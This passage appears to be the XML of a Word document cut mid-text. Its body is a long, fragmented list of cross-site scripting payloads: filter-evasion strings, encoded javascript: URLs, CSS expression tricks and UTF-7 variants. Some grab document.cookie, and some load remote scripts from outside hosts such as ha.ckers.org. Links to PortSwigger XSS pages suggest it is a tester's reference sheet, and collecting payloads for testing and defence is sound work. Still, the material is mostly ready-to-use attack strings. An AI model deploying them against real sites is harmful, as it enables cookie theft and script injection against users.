AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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a="&gt;'&gt;"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&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT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&lt;"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;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fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search</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&lt;script&gt;alert("hellox worldss")&lt;/script&gt;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FORID:9#510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&lt;script&gt;alert("XSS");&lt;/script&gt;&amp;search=1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0&amp;q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT&gt;&amp;submit-frmGoogleWeb=Web+Search</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&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;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ONLOAD=alert('hellox worldss')&gt;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onfocus=write(XSS) autofocus&gt;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&lt;input onblur=write(XSS) autofocus&gt;&lt;input autofocus&gt;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onscroll=alert(XSS)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;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&lt;form&gt;&lt;button formaction="javascript:alert(XSS)"&gt;lol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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(XSS)//"&gt;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&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=alert(XSS)//"&gt;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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(XSS)//"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo="&gt;&lt;x foo='?&gt;&lt;script&gt;alert(1)&lt;/script&gt;'&gt;"&gt;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foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo&gt;&lt;x foo="%&gt;&lt;script&gt;alert(123)&lt;/script&gt;"&gt;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style="font-family:'foo&amp;#10;;color:red;';"&gt;LOL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LOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;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&lt;script&gt;({0:#0=alert/#0#/#0#(0)})&lt;/script&gt;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 xmlns="http://www.w3.org/2000/svg"&gt;LOL&lt;script&gt;alert(123)&lt;/script&gt;&lt;/svg&gt;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&amp;lt;SCRIPT&amp;gt;alert(/XSS/&amp;#46;source)&amp;lt;/SCRIPT&amp;gt;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&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");&amp;lt;/SCRIPT&amp;gt;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&amp;lt;INPUT TYPE=\"IMAGE\" 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&amp;lt;BODY BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;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&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;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DYNSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt;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LOWSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt;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&amp;lt;BGSOUND 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&amp;lt;BR SIZE=\"&amp;{alert('XSS')}\"&amp;gt;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&amp;lt;LAYER SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/LAYER&amp;gt;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&amp;lt;LINK REL=\"stylesheet\" HREF=\"javascript&amp;#058;alert('XSS');\"&amp;gt;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&amp;lt;LINK REL=\"stylesheet\" HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\"&amp;gt;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&amp;lt;STYLE&amp;gt;@import'http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css';&amp;lt;/STYLE&amp;gt;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&amp;lt;META HTTP-EQUIV=\"Link\" Content=\"&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\"&amp;gt;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&amp;lt;STYLE&amp;gt;BODY{-moz-binding&amp;#58;url(\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\")}&amp;lt;/STYLE&amp;gt;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&amp;lt;XSS STYLE=\"behavior&amp;#58; url(xss&amp;#46;htc);\"&amp;gt;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&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS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SRC='vbscript&amp;#058;msgbox(\"XSS\")'&amp;gt;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SRC=\"mocha&amp;#58;&amp;#91;code&amp;#93;\"&amp;gt;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SRC=\"livescript&amp;#058;&amp;#91;code&amp;#93;\"&amp;gt;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žscriptualert(EXSSE)ž/scriptu</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&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&amp;#058;alert('XSS');\"&amp;gt;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&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&amp;gt;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&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert('XSS');\"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&amp;lt;IFRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/IFRAME&amp;gt;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&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/FRAMESET&amp;gt;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&amp;lt;TABLE BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;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&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;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&amp;lt;DIV STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert('XSS'))\"&amp;gt;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&amp;lt;DIV STYLE=\"background-image&amp;#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&amp;#46;1027\0058&amp;#46;1053\0053\0027\0029'\0029\"&amp;gt;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&amp;lt;DIV STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert('XSS'))\"&amp;gt;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&amp;lt;DIV STYLE=\"width&amp;#58; expression(alert('XSS'));\"&amp;gt;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&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript&amp;#58;alert(\"XSS\")';&amp;lt;/STYLE&amp;gt;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STYLE=\"xss&amp;#58;expr/*XSS*/ession(alert('XSS'))\"&amp;gt;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&amp;lt;XSS STYLE=\"xss&amp;#58;expression(alert('XSS'))\"&amp;gt;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exp/*&amp;lt;A STYLE='no\xss&amp;#58;noxss(\"*//*\");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xss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&amp;gt;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&amp;lt;STYLE TYPE=\"text/javascript\"&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;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&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;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&amp;lt;STYLE type=\"text/css\"&amp;gt;BODY{background&amp;#58;url(\"javascript&amp;#058;alert('XSS')\")}&amp;lt;/STYLE&amp;gt;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&amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt;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&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;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&amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt;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&amp;lt;BASE HREF=\"javascript&amp;#058;alert('XSS');//\"&amp;gt;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&amp;lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/OBJECT&amp;gt;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&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;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&amp;lt;EMBED SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt;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&amp;lt;EMBED SRC=\"data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt;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a=\"get\";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b=\"URL(\\"\";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c=\"javascript&amp;#058;\";</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d=\"alert('XSS');\\")\";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eval(a+b+c+d);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&amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\"xss\" implementation=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\"&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt;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&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\"javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert('XSS');\"&amp;gt;&amp;#93;&amp;#93;&amp;gt;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&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;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&amp;lt;XML ID=\"xss\"&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\"javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert('XSS')\"&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;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&amp;lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&amp;gt;&amp;lt;/SPAN&amp;gt;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&amp;lt;XML SRC=\"xsstest&amp;#46;xml\" ID=I&amp;gt;&amp;lt;/XML&amp;gt;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&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;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&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;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&amp;lt;?xml&amp;#58;namespace prefix=\"t\" ns=\"urn&amp;#58;schemas-microsoft-com&amp;#58;time\"&amp;gt;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&amp;lt;?import namespace=\"t\" implementation=\"#default#time2\"&amp;gt;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&amp;lt;t&amp;#58;set attributeName=\"innerHTML\" to=\"XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;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&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;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SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;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&amp;lt;!--#exec cmd=\"/bin/echo '&amp;lt;SCR'\"--&amp;gt;&amp;lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'\"--&amp;gt;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 echo('&amp;lt;SCR)';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echo('IPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;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SRC=\"http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\"&amp;gt;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Redirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&amp;deleteuser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&amp;lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;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&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</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a=\"&amp;gt;\"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=\"&amp;gt;\"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a=\"&amp;gt;\" ''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\"a='&amp;gt;'\"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a=`&amp;gt;`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a=\"&amp;gt;'&amp;gt;\"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&amp;lt;SCRIPT&amp;gt;document&amp;#46;write(\"&amp;lt;SCRI\");&amp;lt;/SCRIPT&amp;gt;PT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HREF=\"http&amp;#58;//66&amp;#46;102&amp;#46;7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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&amp;lt;A HREF=\"http&amp;#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//1113982867/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//0x42&amp;#46;0x0000066&amp;#46;0x7&amp;#46;0x93/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//0102&amp;#46;0146&amp;#46;0007&amp;#46;00000223/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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 p&amp;#58;//6 6&amp;#46;000146&amp;#46;0x7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"//www&amp;#46;google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"//google\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org@google\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//google&amp;#58;ha&amp;#46;ckers&amp;#46;org\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"http&amp;#58;//www&amp;#46;google&amp;#46;com&amp;#46;/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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HREF=\"javascript&amp;#058;document&amp;#46;location='http&amp;#58;//www&amp;#46;google&amp;#46;com/'\"&amp;gt;XSS&amp;lt;/A&amp;gt;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 HREF=\"http&amp;#58;//www&amp;#46;gohttp&amp;#58;//www&amp;#46;google&amp;#46;com/ogle&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;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\u003c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\u003C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&amp;lt;iframe src=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html&amp;gt;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SRC=//ha&amp;#46;ckers&amp;#46;org/&amp;#46;js&amp;gt;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SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js?&amp;lt;B&amp;gt;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&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");//&amp;lt;&amp;lt;/SCRIPT&amp;gt;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&amp;lt;BODY onload!#$%&amp;()*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\&amp;#93;^`=alert(\"XSS\")&amp;gt;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&amp;lt;SCRIPT/XSS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   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perl -e 'print \"&amp;lt;SCR\0IPT&amp;gt;alert(\\"XSS\\")&amp;lt;/SCR\0IPT&amp;gt;\";' &amp;gt; out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perl -e 'print \"&amp;lt;IMG SRC=java\0script&amp;#058;alert(\\"XSS\\")&amp;gt;\";' &amp;gt; out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SRC=\"jav&amp;#x0D;ascript&amp;#058;alert('XSS');\"&amp;gt;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SRC=\"jav&amp;#x0A;ascript&amp;#058;alert('XSS');\"&amp;gt;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SRC=\"jav&amp;#x09;ascript&amp;#058;alert('XSS');\"&amp;gt;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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&amp;gt;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amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&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SRC=javascript&amp;#058;alert(String&amp;#46;fromCharCode(88,83,83))&amp;gt;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\"\"\"&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;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SRC=`javascript&amp;#058;alert(\"RSnake says, 'XSS'\")`&amp;gt;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SRC=javascript&amp;#058;alert(&amp;quot;XSS&amp;quot;)&amp;gt;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&amp;lt;IMG SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;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&amp;lt;SCRIPT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'';!--\"&amp;lt;XSS&amp;gt;=&amp;{()}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amp;#46;fromCharCode(88,83,83))//\';alert(String&amp;#46;fromCharCode(88,83,83))//\";alert(String&amp;#46;fromCharCode(88,83,83))//\\";alert(String&amp;#46;fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String&amp;#46;fromCharCode(88,83,83))&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';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;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'';!--"&lt;XSS&gt;=&amp;{()}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SRC=javascrscriptipt:alert('XSS')&gt;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"""&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;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&amp;#14;  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&lt;SCRIPT/XSS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&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;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¼script¾alert(¢XSS¢)¼/script¾</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CONTENT="0;url=javascript:alert('XSS');"&gt;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SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;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&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;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&lt;TABLE BACKGROUND="javascript:alert('XSS')"&gt;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&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert('XSS')"&gt;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STYLE="background-image: url(javascript:alert('XSS'))"&gt;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STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;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STYLE="width: expression(alert('XSS'));"&gt;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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE&gt;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STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;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&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;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exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert("XSS"))'&gt;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SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);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SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;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&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;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&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT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 id="test" /&gt;&lt;button form="test" formaction="javascript:alert(123)"&gt;TESTHTML5FORMACTION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&lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;crosssitespt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&lt;frameset onload=alert(123)&gt;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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(123)//"&gt;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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(123)//"&gt;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data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;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src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;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src="javascript:alert(1)"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;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&lt;script&gt;({0:#0=alert/#0#/#0#(123)})&lt;/script&gt;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&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x&lt;/script&gt;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&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()&lt;/script&gt;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src="#"&gt;{alert(1)}&lt;/script&gt;;1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&lt;script&gt;crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')&lt;/script&gt;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 xmlns="#"&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;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&lt;svg onload="javascript:alert(123)" xmlns="#"&gt;&lt;/svg&gt;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xmlns="#" src="javascript:alert(1)"&gt;&lt;/iframe&gt;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+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-</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%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-</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+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-</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%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-</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%253cscript%253ealert(document.cookie)%253c/script%253e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“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;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“&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;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“&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;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foo&lt;script&gt;alert(document.cookie)&lt;/script&gt;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&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;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%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E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alert(document.cookie); var foo=’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foo\’; alert(document.cookie);//’;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&lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;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src=asdf onerror=alert(document.cookie)&gt;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"&gt;&lt;script&gt;alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;/script&gt;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&lt;video src=1 onerror=alert(1)&gt;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&lt;audio src=1 onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC1572" w:rsidRDefault="00DC1572"/>
    <w:p w:rsidR="00DC1572" w:rsidRDefault="00DC1572" w:rsidP="00DC1572"/>
    <w:sectPr w:rsidR="00DC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0F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA0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86BFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF18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20A28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B236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D72F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="654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15BD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8900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72"/>
    <w:rsid w:val="003B0D69"/>
    <w:rsid w:val="00D37439"/>
    <w:rsid w:val="00DC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18F2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B861C0CD-460A-41D6-8818-CD11BDE6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30865">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1878010825">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1422993472">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="793249677">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="684332170">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1278830508">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="180854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reflected" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/stored" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/dom-based" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.dottoro.com/ljfvvdnm.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/preventing" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 